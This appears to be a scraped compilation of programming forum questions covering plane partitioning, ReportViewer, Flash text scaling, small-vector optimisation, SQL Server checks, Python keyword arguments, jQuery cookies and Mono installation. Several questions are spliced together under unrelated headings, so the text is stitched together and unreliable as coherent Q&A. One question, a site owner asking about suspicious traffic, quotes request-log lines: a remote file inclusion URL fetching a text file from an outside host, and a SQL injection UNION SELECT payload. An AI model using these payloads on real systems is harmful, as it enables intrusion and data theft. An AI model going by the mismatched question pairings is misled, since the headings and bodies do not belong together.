• How to partition a plane

  Let's say I have a fixed number (X) of points, e.g. coordinates within a given plane (I think you can call it a 2-D point cloud). These points should be partitioned into Y polygons where Y < X. The polygons should not overlap. It would be wonderful if the polygons were konvex (like a Voronoi diagram). Imagine it like locations forming countries. For example, I have 12 points and want to create 3 polygons with 4 points each. I thought about creating a grid which covers the points. Then iterate across the points, assigning them to the closest grid cells. Maybe I miss the obvious? I am sure there are better solutions.   In cPanel's Analog Stats statistics module, I've noticed countless requests to connect to the following example: /?x=19&y=15 The numbers are random, but its always setting x and y variables. Another category of mysterious requests: /?id=http://nic.bupt.edu.cn/media/j1.txt?? There are other attempts at injections in the request log that have straight sql written into them as well. Example: /jobs/jobinfo.php?id=-999.9 UNION ALL SELECT 1,(SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0x73636363726F6F745F7075626C6963),3,4,5,6,7,8,9,10,11,12,13-- It looks like they are all reaching a 404, but I'm still wondering about the intent behind these. I know this is vague, but maybe someone knows that this is normal while using cPanel & phpMyAdmin services. Also, there was a search box installed on the site which could be the reason. Any suggestions as to what all these are?

• Using report viewer, how do I pull from two seperate Datasets

  I have two datasets I need to pull from, A base that both reports use and then a separate one that only one report pulls from. I get the error Error 12 The Value expression for the text box ‘Textbox9’ refers to the field ‘Name’. Report item expressions can only refer to fields within the current dataset scope or, if inside an aggregate, the specified dataset scope. My best guess is I have to associate them with the correct dataset but I have not been able to find any documentation on this. Can someone please tell me where in the rdlc document I need to code something like name.value, "dataset1" or something similar?

• scaleX scaleY increasing left, top margin, and line spacing

  If you have Text with a font that is 72 point for example (and scaleX scaleY = 1) you can achieve the same size with a font size of 12 and scaleX,scaleY = 6. For reasons that would take too long to explain I am applying a large scale factor as in the latter example. The problem is, even though the text is the same size, the line spacing and left and top margins have all been increased but I want them to be the same size as well. As far as the line spacing, I discovered that TextFormat.leading was being automatically increased when scaleX, scaleY was greater than 1, so I just had to reset TextFormat.leading back to 0. That leaves the left and top margins, and I have no idea how those are being increased. I tried TextFormat.blockIndent=0 and TextFormat.leftMargin=0 (and also ignorePadding=true) and it had no effect. And have no clue how to reset the top margin either to its orginal size, in case anyone has an idea for all these.

• small string optimization for vector?

  I know several (all?) STL implementations implement a "small string" optimization where instead of storing the usual 3 pointers for begin, end and capacity a string will store the actual character data in the memory used for the pointers if sizeof(characters) <= sizeof(pointers). I am in a situation where I have lots of small vectors with an element size <= sizeof(pointer). I cannot use fixed size arrays, since the vectors need to be able to resize dynamically and may potentially grow quite large. However, the median (not mean) size of the vectors will only be 4-12 bytes. So a "small string" optimization adapted to vectors would be quite useful to me. Does such a thing exist? I'm thinking about rolling my own by simply brute force converting a vector to a string, i.e. providing a vector interface to a string. Good idea?

• What's the best way to test SQL Server connection programmatically?

  I need to develop a single routine that will be fired each 5 minutes to check if a list of SQL Servers (10 to 12) are up and running. I can try to obtain a simple query in each one of the servers but this means that I have to create a table, view or stored procedure in every server, even if I use any already made SP I need to have a registered user in each server too. The servers are not in the same physical location so having those requirements would be a complex task. Is there a way to simply "ping" from C# one SQL Server? Thanks in advance!

• Preventing ListBox scrolling to top when updated

When adding audio files to the playlist, it first fills the ListBox with the filenames and then (on a separate thread) extracts the ID3 data and overwrites the filenames with the correct Artist - Title information (much like Winamp). But while the ListBox is being updated, it's unscrollable, as it always jumps to the top on every item overwrite. Any way to prevent this?   In python you may have a function definition: def info(object, spacing=10, collapse=1) which could be called in any of the following ways: info(odbchelper) info(odbchelper, 12) info(odbchelper, collapse=0) info(spacing=15, object=odbchelper) thanks to python's allowing of any-order arguments, so long as they're named. The problem we're having is as some of our larger functions grow, people might be adding parameters between spacing and collapse, meaning that the wrong values may be going to parameters that aren't named. In addition sometimes it's not always clear as to what needs to go in. We're after a way to force people to name certain parameters - not just a coding standard, but ideally a flag or pydev plugin? so that in the above 4 examples, only the last would pass the check as all the parameters are named. Odds are we'll only turn it on for certain functions, but any suggestions as to how to implement this - or if it's even possible would be appreciated.

  I'm using ruby on rails 2.3.2 and also using the acts_as_taggable_on puglin. That generated me two db tables: tags and taggings. As I didn't need anything more from those, I didn't create a Tag model, for example. Now the project is more mature, I need to create some methods for tags, so I created a Tag model with some methods in it.   Hi All on click button I need to add object to array and then write array to cookies. From the start this array can be not empty so I parse cookie first. function addToBasket(){ var basket = $.parseJSON($.cookie("basket")) if (basket.length==0||!basket){ var basket=[]; basket.push( { 'number' : this.getAttribute('number'), 'type' : this.getAttribute('product') } ); } else{ basket.push( { 'number' : this.getAttribute('number'), 'type' : this.getAttribute('product') } ); } $.cookie("basket", JSON.stringify(basket)); } And HTML <button type="button" class="btn btn-success btn-lg" number="12" product="accs" onclick="addToBasket()">Add</button> Unfortunately I'm getting Uncaught ReferenceError: addToBasket is not defined onclick. Can't understand what am I doing wrong? Thanks!

• Perl launched from Java takes forever

  I know this is an absolute shot in the dark, but we're absolutely perplexed. A perl (5.8.6) script run by Java (1.5) is taking more than an hour to complete. The same script, when run manually from the command line takes 12 minutes to complete. This is on a Linux host. Logging is the same in both cases and the script is run with the same parameters in both cases. The script does some complex stuff like Oracle DB access, some scp's, etc, but again, it does the exact same actions in both cases. We're stumped. Has anyone ever run into a similar situation? If not and if you were faced with the same situation, how would you consider debugging it?

• Unable to install mono properly on windows 7 64bit

  Hi I am a newbie on mono. I need to develop a software with it as a Grad Project. But I am having a problem on installing mono.I will go step by step : I dowloaded “mono-3.2.3-gtksharp-2.12.11-win32-0” from mono-project.com.And ran the installation process. -But I faced a problem on testing on mono command prompt. I tried to follow the instructions on the page (http://mono-project.com/Mono:Windows)but could not create simple c# file. Any help or comment will be appreciated.
